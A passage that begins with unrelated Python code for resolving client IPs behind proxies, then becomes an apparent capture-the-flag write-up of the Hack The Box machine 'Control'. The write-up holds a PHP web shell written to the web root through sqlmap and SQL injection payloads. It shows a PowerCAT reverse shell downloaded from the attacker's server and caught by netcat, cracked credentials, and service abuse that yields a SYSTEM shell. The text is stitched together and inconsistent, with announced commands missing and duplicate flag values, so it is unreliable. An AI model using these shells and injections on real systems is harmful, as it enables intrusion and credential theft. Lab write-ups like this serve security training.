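    """Resolve the real client by walking X-Forwarded-For from the right, skipping trusted proxies only.

    Returns None when the connection did not arrive via a trusted proxy, the header
    is missing or malformed, or every hop claims to be a proxy.
    """
    try:
        peer = ipaddress.ip_address(remote_addr)
    except ValueError:
        return None
    if not _is_in(peer, TRUSTED_PROXIES):
        return None  # direct connection: any X-Forwarded-For value is attacker-controlled noise
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    if not hops:
        return None
    try:
        chain = [ipaddress.ip_address(h) for h in hops]
    except ValueError:
        return None
    # entries on the right were appended by our proxies; the first untrusted one is the client
    for ip in reversed(chain):
        if not _is_in(ip, TRUSTED_PROXIES):
            return ip
    return None


def gate_hardened(remote_addr: str, headers: Mapping[str, str]) -> bool:
    """Allow admin pages only for requests that came through the proxy from an admin network."""
    ip = client_ip(remote_addr, headers)
    return ip is not None and _is_in(ip, ADMIN_NETWORKS)
```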

SQLi

So the next step was to find the SQLi in the products table. I used Burp to capture the search request to the database so I could exploit it with SQLMAP.

The Info:

I saved the request as control.txt and ran SQLMAP with this command: sqlmap --all -r control.txt --batch

SQLMAP successfully cracked the database and got me what I was looking for: usernames and passwords (as hashes).

I can’t do anything with the passwords I have; I can’t log in to the system unless I upload a shell to get RCE from the SQLi. So I decided to use Burp again to send my PHP payload to create a reverse shell via the database system. I found several RCEs, but used this one. I modified it a bit and my final payload looks like this:

Easier is to use:

root@kali:~/htb/control# cat s2.php
<?php echo shell_exec($_GET["cmd"]); ?>
root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
___
__H__
___ ___[.]_____ ___ ___ {1.3.8#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:32 /2020-02-27/

[03:03:32] [INFO] parsing HTTP request from 'req'
[03:03:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: productName=-4687' OR 8277=8277#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: productName=blah';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL#
---
[03:03:32] [INFO] testing MySQL
[03:03:33] [INFO] confirming MySQL
[03:03:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:03:33] [INFO] fingerprinting the back-end DBMS operating system
[03:03:33] [INFO] the back-end DBMS operating system is Windows
[03:03:34] [WARNING] potential permission problems detected ('Access denied')
[03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y
[03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B)
[03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!!

[*] ending @ 03:03:46 /2020-02-27/

root@kali:~/htb/control#

POWERCAT REVERSE SHELL

Now I need a reverse connection from the Control machine. Since the machine is Windows, I go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.

Setup:

  • I download PowerCAT.ps1 to the working directory
  • Set up the Python HTTP server: python -m SimpleHTTPServer 8081
  • A netcat listener: nc -lvnp 8080
  • And finally “call it from the website” to make it work (in very simple words).

The Activator:

ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/

As soon as I run the above caller, my netcat listener got me the reverse shell:

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr

I have access to the system; however, I’m not able to list the user directories. There are two users, Administrator and Hector, and I get access denied on both user directories.

BUILDING THE TUNNEL (THIS IS A FAILED STEP, PLEASE PROCEED TO THE “WHITEWINTERWOLF WEBSHELL” SECTION)

I fired up netstat -ano to see the processes running and listening.

I found that the WinRM service is active and listening (TCP [::]:5985 [::]:0 LISTENING 4). This service only listens locally and I’m not able to access it externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the Windows binary of PuTTY PLINK from Kali to create the tunnel.

Uploading PLink.exe

Now this turned out to be a hard task for me. I tried the following but got an error:

Setup Python SMBServer

Copy PLink.exe using Command Prompt:

WHITEWINTERWOLF WEBSHELL

So, my plan to copy PuTTY PLINK the good-boy way failed so badly that I went to sleep and shut down my laptop. In my sleep, I was told by the angels that I could use WhiteWinterWolf’s webshell to upload my PuTTY PLINK. Here is what I did:

  • I copied the webshell PHP script to a file called “nshell.php”
  • I used the same request file I used to run SQLMAP in my earlier step
  • I created a new SQLMAP command to copy the script into C:\inetpub\wwwroot\uploads\

My new SQLMAP command:

After running SQLMAP, my new shell was successfully uploaded.

WhiteWinterWolf’s PHP web shell Upload

As soon as I had confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed to the shell:

I upload nc.exe and PuTTY PLINK to be sure that at least one connection will run properly.

Uploading PLink.exe using WhiteWinterWolf’s PHP web shell

I’m going to run PLink.exe first because I wanted to test if it can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunneling. Let us try.

The tunnel was successfully created.

PuTTY PLINK Tunnel Between Windows and Kali Machines

Now I can run Evil-WinRM locally against the Control machine. However, I’m still a low-privileged user, so I need to run Evil-WinRM as user Hector. If you remember, my initial SQLMAP scan revealed 3 users’ password hashes.

hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

SQLMAP managed to get the user manager’s password in clear text; however, Hector’s password is still unknown, so I used John to crack the hash: l33th4x0rhector

0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector

Time to run Evil-WinRM as Hector (and get user.txt):

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 127.0.0.1 -u hector -p 'l33th4x0rhector'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Hector\Documents> dir
*Evil-WinRM* PS C:\Users\Hector\Documents> cd ..
*Evil-WinRM* PS C:\Users\Hector> cd Desktop
*Evil-WinRM* PS C:\Users\Hector\Desktop> type user.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Desktop>

GETTING ROOT

In order to get root, we need to escalate the privileges of our current user, Hector. This article and this article give a great overview of Windows privesc. I had to read several such articles to find the right way to become Administrator of the Control machine.

Let us see what our user Hector is capable of.

Are there any administrator groups?

cmdkey /list also didn’t give me any hint of stored credentials on the box. It’s getting a bit hard for me at this stage.

Checking the Windows ACLs (Access Control Lists) is the most important command to run post-exploitation. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"

The command returned a huge list of ACLs for user Hector:

ABUSING SERVICES

I have a list of services Hector can run with full control. The service “wuauserv” is what I should use, as per the hint I received on the HTB forum.

Windows wuauserv is the system service of the Windows Update feature. It runs only when Windows Update is running: the service runs for a couple of minutes, verifies whether a Windows Update is going on or not, and if nothing is running it stops itself.

If you remember the retired machine Helpline, I exploited the Windows print spooler service to run my nc.exe. I’m going to use the same practice to exploit this machine.

*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe

START LISTENING:

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...

START SERVICE

*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv

Status Name DisplayName 
------ ---- ----------- 
Stopped wuauserv Windows Update

*Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv

REVERSE SHELL AS ADMINISTRATOR

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50826
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd /
C:\>cd Users/Administrator/Desktop
C:\Users/Administrator/Desktop>type root.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv

SERVICE_NAME: wuauserv 
TYPE : 20 WIN32_SHARE_PROCESS 
STATE : 4 RUNNING 
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
*Evil-WinRM* PS C:\Users\Hector\Documents>  taskkill.exe /f /pid 728
SUCCESS: The process with PID 728 has been terminated.

user=>d8782dd01fb15b72c4b5ba77ef2d472b              root=>8f8613f5b4da391f36ef11def4cec1b1

Author: Puckiestyle

 
